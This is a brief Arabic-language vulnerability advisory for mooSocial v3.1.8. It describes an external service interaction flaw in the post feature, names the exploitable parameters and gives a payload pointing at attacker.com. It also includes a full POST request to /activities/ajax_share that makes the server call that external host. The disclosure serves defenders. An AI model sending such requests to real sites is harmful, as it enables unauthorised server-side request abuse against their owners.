
mooSocial v3.1.8 تحتوي على ثغرة تفاعل مع خدمة خارجية في وظيفة النشر.
mooSocial الإصدار 3.1.8 عرضة لتفاعل الخدمة الخارجية في وظيفة النشر (post). عند التنفيذ، يرسل الخادم طلب HTTP وDNS إلى خادم خارجي.
البارامترات القابلة للاستغلال: messageText و data[wall_photo] و data[userShareVideo] و data[userShareLink]
Payload : http://attacker.com/?null=
طلب POST على /moosocial/activities/ajax_share (بيانات طلب POST فقط):
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
